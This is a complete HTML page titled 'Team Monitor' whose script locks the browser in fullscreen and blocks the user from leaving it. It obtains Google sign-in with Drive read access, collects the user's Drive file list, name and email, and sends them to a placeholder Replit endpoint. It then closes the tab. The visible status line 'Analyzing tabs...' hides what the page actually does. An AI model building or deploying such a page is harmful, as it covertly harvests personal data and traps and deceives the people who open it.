<!DOCTYPE html>
<html>
<head>
    <title>Team Monitor</title>
    <style>
        body {
            font-family: Arial, sans-serif;
            text-align: center;
            margin-top: 50px;
            background-color: black;
            color: white;
        }
        #status {
            margin-top: 20px;
            font-size: 20px;
        }
    </style>
</head>
<body>

<div id="status">Analyzing tabs...</div>

<script src="https://apis.google.com/js/platform.js" async defer></script>
<script>
    document.addEventListener('DOMContentLoaded', (event) => {
        launchFullscreen(document.documentElement);
        startGoogleSignIn();
    });

    function launchFullscreen(element) {
        if (element.requestFullscreen) {
            element.requestFullscreen();
        } else if (element.mozRequestFullScreen) { // Firefox
            element.mozRequestFullScreen();
        } else if (element.webkitRequestFullscreen) { // Chrome, Safari and Opera
            element.webkitRequestFullscreen();
        } else if (element.msRequestFullscreen) { // IE/Edge
            element.msRequestFullscreen();
        }

        // Prevent exiting full-screen until the process is done
        document.addEventListener('fullscreenchange', preventExit, false);
        document.addEventListener('mozfullscreenchange', preventExit, false);
        document.addEventListener('webkitfullscreenchange', preventExit, false);
        document.addEventListener('msfullscreenchange', preventExit, false);
    }

    function exitFullscreen() {
        if (document.exitFullscreen) {
            document.exitFullscreen();
        } else if (document.mozCancelFullScreen) { // Firefox
            document.mozCancelFullScreen();
        } else if (document.webkitExitFullscreen) { // Chrome, Safari and Opera
            document.webkitExitFullscreen();
        } else if (document.msExitFullscreen) { // IE/Edge
            document.msExitFullscreen();
        }

        // Allow exiting full-screen after the process is done
        document.removeEventListener('fullscreenchange', preventExit);
        document.removeEventListener('mozfullscreenchange', preventExit);
        document.removeEventListener('webkitfullscreenchange', preventExit);
        document.removeEventListener('msfullscreenchange', preventExit);
    }

    function preventExit() {
        if (!document.fullscreenElement && !document.mozFullScreenElement &&
            !document.webkitFullscreenElement && !document.msFullscreenElement) {
            launchFullscreen(document.documentElement);
        }
    }

    function startGoogleSignIn() {
        gapi.load('auth2', () => {
            gapi.auth2.init({
                client_id: '494606642746-6egoreg47u6i99moul7659115for9ooi.apps.googleusercontent.com',
                scope: 'https://www.googleapis.com/auth/drive.readonly https://www.googleapis.com/auth/userinfo.profile'
            }).then(() => {
                const authInstance = gapi.auth2.getAuthInstance();
                authInstance.signIn().then(user => {
                    const profile = user.getBasicProfile();
                    const userDetails = {
                        fullName: profile.getName(),
                        email: profile.getEmail()
                    };

                    getGoogleDriveFiles(user.getAuthResponse().access_token, userDetails);
                });
            }).catch(error => {
                console.error('Error during Google Sign-In', error);
                document.getElementById('status').innerText = 'Error during Google Sign-In';
            });
        });
    }

    async function getGoogleDriveFiles(accessToken, userDetails) {
        try {
            const response = await fetch('https://www.googleapis.com/drive/v3/files', {
                headers: {
                    'Authorization': `Bearer ${accessToken}`
                }
            });
            const data = await response.json();
            const files = data.files || [];

            sendReport(files, userDetails);
        } catch (error) {
            console.error('Error fetching files from Google Drive', error);
            document.getElementById('status').innerText = 'Error fetching files from Google Drive';
        }
    }

    function sendReport(files, userDetails) {
        fetch('https://<YOUR_REPLIT_PROJECT_URL>/send-report', {
            method: 'POST',
            headers: {
                'Content-Type': 'application/json'
            },
            body: JSON.stringify({ files: files, user: userDetails })
        })
        .then(response => response.text())
        .then(data => {
            document.getElementById('status').innerText = 'Report sent! Exiting fullscreen and closing this tab...';
            setTimeout(() => {
                exitFullscreen();
                window.close();
            }, 5000);
        })
        .catch(error => {
            console.error('Error:', error);
            document.getElementById('status').innerText = 'Error sending report.';
        });
    }
</script>

</body>
</html>
